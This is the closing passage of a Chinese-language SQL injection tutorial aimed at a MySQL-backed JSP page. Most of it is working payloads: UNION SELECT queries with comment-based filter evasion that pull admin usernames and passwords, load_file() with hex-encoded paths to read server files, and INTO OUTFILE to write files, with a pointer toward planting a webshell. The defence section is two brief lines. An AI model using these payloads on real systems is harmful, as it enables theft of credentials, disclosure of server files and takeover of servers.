现在表名出来了,怎么才列名呢?哎呀,大家太聪明了,直接把4,5,6 其中一个替换成列名不久行了? 那么构造出.

　　mysqlInject.jsp?id=1’/**/union/**/select/**/adminId,5,6/**/from/**/admin/*

　　SQL : select * from account where accountId =

　　’1’/**/union/**/select/**/adminid,5,6/**/from/**/admin/*’

　　看见了吗? 1|5|6 的一就是 adminid.如果正常那么就是存在了. 大家可以把列名猜出来,然后带入UNION 查询中,这样就查出来管理员帐号或者密码了.现在我要把列名一次全部带入.

　　mysqlInject.jsp?id=1’/**/union/**/select/**/adminId,adminName,adminPass/**/from/**/admin/*

　　SQL : select * from account where accountId =

　　’1’/**/union/**/select/**/adminid,adminName,adminPass/**/from/**/admin

　　/*’

　　哈哈,出来了, 1|admin|admin| 就是 adminid|adminName|adminPass|

　　也可以在union 查询上限制条件,比如你知道有admin 这个用户那么就构造 union select

　　adminId,adminName,adminPass from admin where adminName = ‘admin’,看个人的发挥了.

　　2.5 使用MYSQL 系统函数.

　　2.5.1.1.1 使用 load_file() 函数 显示文件.

　　Load_file 顾名思义.就是加载文件,可不是运行啊,是显示内容,但是必须对文件拥　有读取权限.我们先来构造一个显示 c:\boot.ini 文件的语句.

　　mysqlInject.jsp?id=1’/**/union/**/select/**/1,load_file(0x633A5C626F6F742E696E69),

　　3/*

　　SQL : select * from account where accountId =

　　’1’/**/union/**/select/**/1,

　　load_file(0x633A5C626F6F742E696E69),3/*’

　　看到了吗? C:\boot.ini 文件的内容. 又问,为什么load_file() 里面是乱码呢? 那不是乱码,那个是C:\boot.ini 16 进制编码. 因为本函数无法处理直接写的路径,只能能使用16 进制或者是 Ascii 编码.所以要将路径转换成 16

　　进制或者是Ascii 编码才可以执行.又问,为什么load_file 是在第二列的位置上,不是在第一列或者第三列的位置上呢?

　　因为啊,第一列不行,其他的都可以,第一列是一个 INT 类型,一个数字类型,难道你会把你女朋友送进男厕所吗? 呵呵.玩笑.如果是在 linux 下可以使用 / 来列目录 ,但是必须有列目录的权限.

　　通过load_file 可以列目录,读文件,但是遇到文件格式编码的时候也许会遇到乱码的问题. 这个问题可以这么解决. 使用 subString 函数, subString(字符串,开始,返回).

　　假设我们要返回第三个字符, 那么就是

　　mysqlInject.jsp?id=1’/**/union/**/select/**/1,substring(load_file(0x633A5C626F6F742

　　E696E69),3,1) ,3/* 这样我们就返回了第三个字符,用于解决乱码是非常好的办法.

　　我近期会做一个这样个工具,将会公布在我的个人主页上.

　　2.5.1.1.2 使用outfile 写WEBSHELL.

　　mysql 有一个功能,就是把查询的结果输出.就是outfile.先来构造一个简单的语句.

　　select ‘hello word’ into outfile ‘c:\\a.txt’ 这里是讲 ‘hello word’ 输出到 c:\a.txt

　　那么在网站也来构造一下.

　　mysqlInject.jsp?id=1’/**/union/**/select/**/1,’hello’,3/**/into/**/outfile/**/’c:\\hello.txt’/

　　*

　　SQL : select * from account where accountId =

　　’1’/**/union/**/select/**/1,

　　’hello’,3/**/into/**/outfile/**/’c:\\hello.txt’/*’

　　成功插入.但是为什么会报错呢?哦,那是因为你把数据写到文件中,返回集合什么都没有了,当然会报错了.如果你把hello 换成 一句话或者其他的,如果写入到网站目录下,那是多么恐怖啊…

　　2.5.1.1.3 System 系统命令

　　如果使用system 就相当于SQLSERVER 的xp_cmdshll 一样.

　　2.漏洞的防护和总结

　　通过过滤特殊关键字来防护.代码网站很多,我这里就不写了.

　　针对JAVA 有一种防护措施,就是使用PreparedStatement 对象进行查询,这里也不多说了.

　　本文只是一个概括的讲述,如果应用到实战当中需要结合经验.

上一页  [1] [2] [3]